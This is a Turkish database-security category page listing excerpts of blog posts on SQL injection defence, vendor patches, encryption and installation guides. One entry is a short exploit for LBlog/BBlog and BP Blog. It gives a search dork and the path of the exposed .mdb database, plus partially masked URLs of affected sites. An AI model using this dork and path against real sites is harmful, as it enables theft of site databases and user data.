Skip to content

Category: Veritabanıİçeriği paylaş

SQL Enjeksiyona karşı 4 veritabanı güvenlik tavsiyesi

December 10, 2009 yazan Sayid

Sayid kullanıcısının resmi

SQL Injection Verizon'un en sık rastlanan 15 güvenlik saldırısı listesinde 3. sıradaydı. SQL enjeksiyon saldırılarına alınan önlemler veri güvenliği veya haber sitelerinde manşet olma ile sonuçlanabilir. Bu yazıda veritabanı ve uygulamalarınızı korumada işinize yarayacak bir kaç tavsiye vereceğim.

6 aralıkta bir araştırmacı SQL enjeksiyon ile bazı NASA web sitelerine sızdığının kanıtlarını yayınladı. NASA için tek iyi yanı, amacın sadece sitelerin zayıflığını göstermek olması.

NoSQL ve cloud veritabanlarının geleceği

December 10, 2009 yazan Sayid

Sayid kullanıcısının resmi

Son günlerde yazılım geliştiricilerinin Cloud ile alakalı önem verdiği konulardan biri de ilişkisel olmayan (nonrelational) teknolojiye dayalı bir operasyonel-veri teknolojileri seti olan NoSQL fikri.

LBlog Ve BBlog veritabanı ifşa açığı admin\db\newFolder\Lblog.mdb

May 14, 2009 yazan by_netex

Exploit Code :  

Dork:''Powered By Lblog''
exploit: " admin\db\newFolder\Lblog.mdb "db(database)
BP Blog V6.0 & V7.0 & V8.0 & V9.0 Database Disclosure Vulnerability
##############################
## {E} www.site.com/{path}/Blog.mdb
## {E}
V6.0 -->> www...s.net/blog/Blog.mdb
V7.0 -->> www.ig...ty.com/blog/Blog.mdb
V8.0 -->> www.ke....org/blog/Blog.mdb
V9.0 -->> www.its...fc.com/blog/Blog.mdb

Microsoft (sonunda) SQL sunucusu açığını onayladı

December 24, 2008 yazan Sayid

Sayid kullanıcısının resmi

Microsoft'un güvenlik cinleri Microsoft SQL Server 2000, 2005 ve Windows Internal Database'i bazı konfigürasyonlarda etkileyen güvenlik açığı için exploit kodu olduğunu onayladı.

Pozitif bakmak gerekirse, SQL Server 7.0 SP4, SQL Server 2005 SP3 ve SQL Server 2008 bu açıktan etkilenmiyor.

Oracle Geliştiricileri için SQL Injection Saldırıları ve Korunma Yöntemleri

November 6, 2007 yazan SirVivor

SirVivor kullanıcısının resmi

Giriş
Arka-planda Oracle veritabanı kullanan çoğu uygulama geliştiricisi SQL Injection saldırıları riskini hafife alıyor. Yaptığımız  web uygulama denetimlerinde çoğü web uygulama geliştiricisinin SQL Injection saldırılarının risklerini ve bu tip saldırıları engellemede kullanılan basit teknikleri tam olarak anlamadığını gördük.

Oracle 51 güvenlik yaması çıkardı

October 17, 2007 yazan SirVivor

SirVivor kullanıcısının resmi

Oracle dün 27 tanesi Oracle veritabanı için olmak üzere 51 güvenlik yaması çıkardı. Oracle'ın açıkları değerlendirmesindeki risk seviyeleri bazılarına göre gerçek risk seviyesinin altında.

Oracle sistemlerin yöneticileri aşağıdaki yamaları geçecekler:

SQL Server 2008 - Transparan veri kriptolama özelliği

October 5, 2007 yazan Sayid

Sayid kullanıcısının resmi

Laurentiu Cristofor'un blog'undan çeviridir.
TDE (Transparent Data Encryption) iki kriptolama ihtiyacını karşılıyor:

  1. Veriyi kullanan uygulamaları etkilemeden verilerin kriptolanması
  2. Tüm veritabanını kriptolama

ASP ile Veritabanı Güvenliği

July 9, 2007 yazan ibalic

 1.ADG Giriş
 2.Asp Ile DataBase Güvenliği
 3.Örnek Bir Uygulama
 4.ADG Çıkış

  [1.ADG Giriş]
  '''''''''''''
-------------------------------------------------------------------------------------------------

 ADG, "Asp ile DataBase Güvenliği" Kelimelerinin Başharflerinden Oluşur Asp ile Database Güvenliği, Yazmış Olduğunuz Scriptinizde Dinamik/Sabit Olarak Tutalacak Kayıtların,Saklanmış Olduğu Veri Deposunun Korunmasıdır.

SQL Server 2005 Kurulumu

January 12, 2007 yazan Anıl Erduran

Günümüzde önüzme çıkan şirketlerin büyük çoğunluğunda küçüklü büyüklü veritablarına rastlarız.Bir sistemci olarak aslında yazılım alanının bir parçası olan SQL SERVER konusundada en azından yönetim bölümü hakkında bilgi sahibi olmalıyız.Bu ileride bize ek avantaj sağlar.

SUSE 10.1 Uzerinde PostgreSQL Kurulumu

June 20, 2006 yazan okaratas

Bildiğiniz gibi kısa bir süre önce Suse Linux 10.1 versiyonu duyuruldu. Suse Linux 10.1 ISO kopyalarını nereden temin edebileceğinizi bilmiyorsanız, belgenin Linkler kısmına bakabilirsiniz. Bu belgede Suse Linux üzerinde PostgreSQL (v8.1.4) kurulumu anlatılacaktır.
1. Kaynak kodunu indirelim ve paketi açalım:

AdaptiveThemes